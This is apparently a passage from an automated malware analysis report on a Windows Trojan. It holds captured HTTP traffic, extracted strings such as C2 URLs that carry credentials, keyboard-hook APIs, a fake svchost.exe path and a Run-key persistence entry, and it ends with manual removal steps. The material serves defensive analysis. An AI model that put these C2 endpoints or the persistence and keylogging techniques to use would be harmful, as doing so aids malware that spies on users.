..T.D.?...b..E...WOQ.@./.B\}.Sn$uB....i..`RY./!.\..R..9$.Ll)...H..C.,E
\Vk., .`..br..N....^t._:C...P...eR.f..}....J..-..)61...M6.. ..c..M
<<< skipped >>>


POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 25

sid=1005&pid=0&sw=C_gr294
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error repo
rt</title><style><!--H1 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-f
amily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;fon
t-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;back
ground-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,s
ans-serif;color:black;background-color:white;} B {font-family:Tahoma,A
rial,sans-serif;color:white;background-color:#525D76;} P {font-family:
Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A
 {color : black;}A.name {color : black;}HR {color : #525D76;}--><
;/style> </head><body><h1>HTTP Status 500 - </
h1><HR size="1" noshade="noshade"><p><b>type</
b> Exception report</p><p><b>message</b> &l
t;u></u></p><p><b>description</b> <
;u>The server encountered an internal error () that prevented it fr
om fulfilling this request.</u></p><p><b>excep
tion</b> <pre>java.io.FileNotFoundException: /home/knet/st
at/cfg/url.properties (No such file or directory)..java.io.FileInputSt
ream.open(Native Method)..java.io.FileInputStream.<init>(FileInp
utStream.java:120)..java.io.FileInputStream.<init>(FileInputStre
am.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.
knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<< skipped >>>


POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 54

sid=0104&os=6&FromTo=(002.006.000.000-002.006.000.042)
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
<html><head><title>Apache Tomcat/7.0.22 - Error repo
rt</title><style><!--H1 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-f
amily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;fon
t-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;back
ground-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,s
ans-serif;color:black;background-color:white;} B {font-family:Tahoma,A
rial,sans-serif;color:white;background-color:#525D76;} P {font-family:
Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A
 {color : black;}A.name {color : black;}HR {color : #525D76;}--><
;/style> </head><body><h1>HTTP Status 500 - </
h1><HR size="1" noshade="noshade"><p><b>type</
b> Exception report</p><p><b>message</b> &l
t;u></u></p><p><b>description</b> <
;u>The server encountered an internal error () that prevented it fr
om fulfilling this request.</u></p><p><b>excep
tion</b> <pre>java.io.FileNotFoundException: /home/knet/st
at/cfg/url.properties (No such file or directory)..java.io.FileInputSt
ream.open(Native Method)..java.io.FileInputStream.<init>(FileInp
utStream.java:120)..java.io.FileInputStream.<init>(FileInputStre
am.java:79)..java.io.FileReader.<init>(FileReader.java:41)..net.
knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103).
<<< skipped >>>









svchost.exe_1992:




`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute4
ole32.dll
olepro32.dll
supports
importNode
%s="%s"
%s%s%s: %d%s%s
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortT
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordPeH
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient4
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP4
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions0
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
IWebBrowser
IWebBrowserApp
IWebBrowser2P
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowser
TWebBrowserX
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop4
OnWindowSetWidth
OnWindowSetHeight
DLCTL_URL_ENCODING_DISABLE_UTF8
DLCTL_URL_ENCODING_ENABLE_UTF8
FzWebBrowser
TFzWebBrowser
WebBrowser1
WebBrowser1NavigateError
WebBrowser1NewWindow2
WebBrowser1NewWindow3
http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=
&key=
WebBrowser1NewWindow2"
WebBrowser1StatusTextChange
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
*.txt
http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=
%s
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://
%s%s%s%s%S
ServiceExecute
c:\MP3\svchost.exe
c:\MP3
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wininet.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.SHDocVw_TLB
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
OnExecute
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2000/xmlns/
http://www.w3.org/2001/XMLSchema-instance
http://www.easy78.cn
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
 Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread Error: %s (%d)
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_1992_rwx_003D0000_00002000:




The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

svchost.exe_1992_rwx_00401000_000B5000:




kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute4
ole32.dll
olepro32.dll
supports
importNode
%s="%s"
%s%s%s: %d%s%s
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortT
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordPeH
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient4
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP4
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions0
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
IWebBrowser
IWebBrowserApp
IWebBrowser2P
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowser
TWebBrowserX
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop4
OnWindowSetWidth
OnWindowSetHeight
DLCTL_URL_ENCODING_DISABLE_UTF8
DLCTL_URL_ENCODING_ENABLE_UTF8
FzWebBrowser
TFzWebBrowser
WebBrowser1
WebBrowser1NavigateError
WebBrowser1NewWindow2
WebBrowser1NewWindow3
http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=
&key=
WebBrowser1NewWindow2"
WebBrowser1StatusTextChange
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
*.txt
http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=
%s
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://
%s%s%s%s%S
ServiceExecute
c:\MP3\svchost.exe
c:\MP3
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wininet.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.SHDocVw_TLB
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
OnExecute
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2000/xmlns/
http://www.w3.org/2001/XMLSchema-instance
http://www.easy78.cn
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
 Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread Error: %s (%d)
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

idnsvr.exe_4052:




.text
`.rdata
@.data
.rsrc
user32.dll
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegNotifyChangeKeyValue
ADVAPI32.dll
ole32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
GetCPInfo
advapi32.dll
cnprovh.dll
FinalMsg
repreg.dat
replace.dat
ctrcfg.ini
usrcfg.ini
idnsvr.dll
\\.\CnTran
159.226.1.19
xn--cnnic-vo0ll97o.xn--fiqs8s
ipconfig.exe /flushdns
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
%Program Files%\OCINS\
dnsvr.exe
%Program Files%\OCINS\idnsvr.exe
.Xtnz
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
2, 6, 0, 0
idnsvr.exe
1.2.6.7
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
Replace%Select the entire document






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    soft256.exe:2724
    cnnic_1009.exe:2892
    m4.exe:2840
    update.exe:3408
    setup.exe:2200
    setup.exe:3476
    setup.exe:3264
    %original file name%.exe:1712
    idnsvr.exe:4052
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    %System%\e1JePg78g.dll (33 bytes)
    %System%\setup.exe (12214 bytes)
    C:\MP3\svchost.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
    %Program Files%\OCINS\convf.dll (1281 bytes)
    %Program Files%\OCINS\replace.dat (343 bytes)
    %Program Files%\OCINS\kwacs.dat (16 bytes)
    %System%\drivers\cnprov.sys (673 bytes)
    %Program Files%\OCINS\cuscfg.dat (145 bytes)
    %Program Files%\OCINS\ctrcfg.ini (230 bytes)
    %Program Files%\OCINS\cnrbtn.html (486 bytes)
    %System%\drivers\idnaux.sys (10 bytes)
    %Program Files%\OCINS\version.dat (482 bytes)
    %Program Files%\OCINS\kwrep.dat (191 bytes)
    %Program Files%\OCINS\idnaux.dat (39 bytes)
    %Program Files%\OCINS\uninstall.exe (673 bytes)
    %Program Files%\OCINS\srchsp.dll (32 bytes)
    %Program Files%\OCINS\ieaux.dll (673 bytes)
    %System%\cnprov.dat (1 bytes)
    %Program Files%\OCINS\cnstc.ini (1 bytes)
    %WinDir%\ocinfo.dat (8 bytes)
    %System%\idnreg.dll (36 bytes)
    %Program Files%\OCINS\addrmsg.dll (601 bytes)
    %Program Files%\OCINS\addrmsg.ini (6 bytes)
    %Program Files%\OCINS\cnprovh.dll (601 bytes)
    %Program Files%\OCINS\convs.dll (601 bytes)
    %Program Files%\OCINS\cndsv.dll (601 bytes)
    %Program Files%\OCINS\config.exe (601 bytes)
    %Program Files%\OCINS\idnsvr.exe (601 bytes)
    %Program Files%\OCINS\idnsvr.dll (601 bytes)
    %Program Files%\OCINS\usrcfg.ini (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Program Files%\OCINS\update\version.dat (482 bytes)
    %Program Files%\OCINS\austr.dll (65 bytes)
    %Program Files%\OCINS\update\data2.cab (9696 bytes)
    %Program Files%\OCINS\update\update.exe (273697 bytes)
    %Program Files%\OCINS\update\austr.dll (1568 bytes)
    

    5. 

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"
    

    6. 

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    7. 

  7. Reboot the computer.
    8. 



